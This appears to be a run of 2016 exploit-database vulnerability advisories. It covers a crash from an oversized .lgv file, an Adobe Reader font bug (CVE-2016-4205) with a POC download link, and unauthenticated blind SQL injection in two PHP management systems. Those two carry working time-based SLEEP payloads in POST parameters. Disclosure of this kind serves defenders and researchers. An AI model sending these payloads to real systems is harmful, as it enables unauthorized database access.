xmm5/0 41414141
xmm5/1 41414141
xmm5/2 41414141
xmm5/3 41414141
xmm6/0 41414141
xmm6/1 41414141
xmm6/2 41414141
xmm6/3 41414141
xmm7/0 41414141
xmm7/1 41414141
xmm7/2 41414141
xmm7/3 41414141
Exploit code(s):
===============
1) create .lgv file with bunch of 'A's length of 4096 overwrites XXM
registers, ECX etc
2) run from command line pipe the file to it to watch it crash and burn.
///////////////////////////////////////////////////////////////////////
Disclosure Timeline:
===============================
Vendor Notification: June 23, 2016
Vendor acknowledged: July 1, 2016
Vendor reply: Will not fix (stability issue)
July 8, 2016 : Public Disclosure
Severity Level:
================
Low
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin and Pier-Luc Maltais of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4205
# COSIG-2016-30
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin and Pier-Luc Maltais of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-30.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40095.zip
####################################################################################
####
# Vulnerability Title : Clinic Management System Unauthenticated Blind SQL Injection (apointment.php age) Vulnerability
# Date : 11/07/2016
# Exploit Author : Yakir Wizman
# Vendor Homepage : http://rexbd.net/software/clinic-management-system
# Version : All Versions
# Tested on : Apache | PHP 5.5.36 | MySQL 5.6.30
####
####
# Vendor Software Description:
# Clinico – Clinic Management System is powerful, flexible, and easy to use responsive platform.
# The system has control for all system modules thats enables you to develop your organization billing system and improve its effectiveness and quality.
####
# No authentication (login) is required to exploit this vulnerability.
# Blind SQL Injection Proof-Of-Concept (Using SQLMap)
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# URL example : http://server/apointment.php
#
# Page : apointment.php
# Parameter : age (POST)
# Type : AND/OR time-based blind
# Title : MySQL >= 5.0.12 AND time-based blind
# Payload : ame=Test&age=24’ AND SLEEP(5) AND 'dQNv'='dQNv&sex=on&mobile=+972-50-7655443&email=test@gmail.com&date=07/12/2016&btext=Test
#
####
####
# Vulnerability Title : Beauty Parlour & SPA Saloon Management System Unauthenticated Blind SQL Injection (booking.php age) Vulnerability
# Date : 11/07/2016
# Exploit Author : Yakir Wizman
# Vendor Homepage : http://rexbd.net/software/beauty-parlour-and-spa-saloon-management-system
# Version : All Versions
# Tested on : Apache | PHP 5.5.36 | MySQL 5.6.30
####
# Software Link : N/A
# Google Dork : N/A
# CVE : N/A
####
# Vendor Software Description:
# Managing a health and beauty business is a unique endeavor that is unlike any other. You want an operating software that will enhance the atmosphere you’ve worked hard to instill in your salon.
# Our salon management system was created to effectively match the needs of health and beauty business owners nationwide.
# When you purchase this beauty Parlour / salon software, you will find that every aspect of managing your company is covered in this extensive system.
####
# No authentication (login) is required to exploit this vulnerability.
# Blind SQL Injection Proof-Of-Concept (Using SQLMap)
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# URL example : http://server/booking.php
#
# Page : booking.php
# Parameter : age (POST)
# Type : AND/OR time-based blind
# Title : MySQL >= 5.0.12 AND time-based blind
# Payload : name=Test&age=2016' AND SLEEP(5) AND 'hhFr'='hhFr&sex=on&mobile=+972-50-7655443&email=test@gmail.com&date=07/12/2016&btext=Test
#
####